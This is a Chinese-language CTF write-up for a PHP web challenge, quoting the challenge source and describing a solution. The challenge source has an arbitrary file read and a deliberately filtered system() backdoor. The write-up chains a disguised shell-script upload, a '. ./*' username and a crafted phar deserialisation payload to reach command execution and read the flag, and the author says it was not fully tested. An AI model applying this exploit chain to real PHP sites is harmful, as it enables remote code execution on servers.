这是一个非预期解,但是得到出题人的赞许,莫名开心,哈哈:
cancan need处存在任意文件读取
<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>login</title>
<link rel="stylesheet" type="text/css" href="css/button.css" />
<link rel="stylesheet" type="text/css" href="css/button.min.css" />
<link rel="stylesheet" type="text/css" href="css/input.css" />
<style>
body{
text-align:center;
margin-left:auto;
margin-right:auto;
margin-top:300px;
}
</style>
</head>
<body>
<?php
error_reporting(0);
session_start();
include 'class.php';
if(isset($_POST['username']) && $_POST['username']!=''){
#修复了登录还需要passwd的漏洞
$user = new User($_POST['username']);
}
if($_SESSION['isLogin']){
die("<script>alert('Login success!');location.href='file.php'</script>");
}else{
die('
<form action="index.php" method="post">
<div class="ui input">
<input type="text" name="username" placeholder="Give me uname" maxlength="6">
</div>
<form>');
}<?php
class User
{
public $username;
public function __construct($username){
$this->username = $username;
$_SESSION['isLogin'] = True;
$_SESSION['username'] = $username;
}
public function __wakeup(){
$cklen = strlen($_SESSION["username"]);
if ($cklen != 0 and $cklen <= 6) {
$this->username = $_SESSION["username"];
}
}
public function __destruct(){
if ($this->username == '') {
session_destroy();
}
}
}
class File
{
#更新黑名单为白名单,更加的安全
public $white = array("jpg","png");
public function show($filename){
echo '<div class="ui action input"><input type="text" id="filename" placeholder="Search..."><button class="ui button" onclick="window.location.href=\'file.php?m=show&filename=\'+document.getElementById(\'filename\').value">Search</button></div><p>';
if(empty($filename)){die();}
return '<img src="data:image/png;base64,'.base64_encode(file_get_contents($filename)).'" />';
}
public function upload($type){
$filename = "dasctf".md5(time().$_FILES["file"]["name"]).".$type";
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
return "Upload success! Path: upload/" . $filename;
}
public function rmfile(){
system('rm -rf /var/www/html/upload/*');
}
public function check($type){
if (!in_array($type,$this->white)){
return false;
}
return true;
}
}
#更新了一个恶意又有趣的Test类
class Test
{
public $value;
public function __destruct(){
chdir('./upload');
$this->backdoor();
}
public function __wakeup(){
$this->value = "Don't make dream.Wake up plz!";
}
public function __toString(){
$file = substr($_GET['file'],0,3);
file_put_contents($file, "Hack by $file !");
return 'Unreachable! :)';
}
public function backdoor(){
if(preg_match('/[A-Za-z0-9?$@]+/', $this->value)){
$this->value = 'nono~';
}
system($this->value);
}
}
进程已结束,退出代码0<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>login</title>
<link rel="stylesheet" type="text/css" href="css/button.css" />
<link rel="stylesheet" type="text/css" href="css/button.min.css" />
<link rel="stylesheet" type="text/css" href="css/input.css" />
<style>
.show{
text-align:center;
margin-left:auto;
margin-right:auto;
margin-top:240px;
}
.run{
text-align:right;
margin-left:auto;
margin-right:auto;
}
</style>
</head>
<body>
<div class="run">
<div class="ui animated button" tabindex="0" onclick="window.location.href='file.php?m=logout'">
<div class="hidden content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">润!</font>
</font>
</div>
<div class="visible content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">🏃</font>
</font>
</div>
</div>
</div>
<div class="show">
<?php
error_reporting(0);
session_start();
include 'class.php';
if($_SESSION['isLogin'] !== true){
die("<script>alert('号登一下谢谢。');location.href='index.php'</script>");
}
$form = '
<form action="file.php?m=upload" method="post" enctype="multipart/form-data" >
<input type="file" name="file">
<button class="mini ui button" ><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
提交
</font></font></button>
</form>';
$file = new file();
switch ($_GET['m']) {
case 'upload':
if(empty($_FILES)){die($form);}
$type = end(explode(".", $_FILES['file']['name']));
if ($file->check($type)) {
die($file->upload($type));
}else{
die('你食不食油饼🤬');
}
break;
case 'show':
die($file->show($_GET['filename']));
break;
case 'rm':
$file->rmfile();
die("全删干净了捏😋");
break;
case 'logout':
session_destroy();
die("<script>alert('已退出登录');location.href='index.php'</script>");
break;
default:
echo '<h2>Halo! '.$_SESSION['username'].'</h2>';
break;
}
?>
<div class="ui animated button" tabindex="0" onclick="window.location.href='file.php?m=upload'">
<div class="visible content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">来点😍图</font>
</font>
</div>
<div class="hidden content">
<font style="vertical-align: inherit;">🥵</font>
</font>
</div>
</div>
<div class="ui vertical animated button" tabindex="0" onclick="window.location.href='file.php?m=rm'">
<div class="hidden content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">销毁证据</font>
</font>
</div>
<div class="visible content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">🧹</font>
</font>
</div>
</div>
<div class="ui animated fade button" tabindex="0" onclick="window.location.href='file.php?m=show'">
<div class="visible content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">cancan need</font>
</font>
</div>
<div class="hidden content">
<font style="vertical-align: inherit;">
<font style="vertical-align: inherit;">👀</font>
</font>
</div>
</div>
<script src="js/package.js"></script>
</div>
</body>
</html>这种查文件+文件上传,多半就是考phar,但是这次没做出来主要卡在system的过滤了
本来的思路是上传一个文件1.jpg,内容如下:
#!/bin/bash
ls /
这个文件在/upload目录下面,只要命令是. ./*就可以执行命令了,接下来就是如何实现了:
第一步:
普通用户,上传1.jpg
第二步:
修改名字为. ./*
上传一个phar文件:
<?php
class User
{
public $username;
}
class Test
{
public $value;
}
$b = new User();
$a = new Test();
$b->username = new Test();
$b->test = $a;
$a->value = &$b->username;
// echo serialize($b);
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($b);
$phar->addFromString("exp.txt", "test");
$phar->stopBuffering();
rename("test.phar", "ameuu.jpg");关于这一步是如何把username=. ./*赋值给value的,是因为登陆的时候把数据写到SESSION了,反序列化的时候会取出来。
原理是这样,但是还是没有落实到位,因为本地Ubuntu不知道为什么上传不了文件,只能暂时作罢。
不能给出更详细的步骤,见谅。
第三步:
phar读取文件:触发ls /
第四步:
直接读取/ghjsdk_F149_H3re_asdasfc
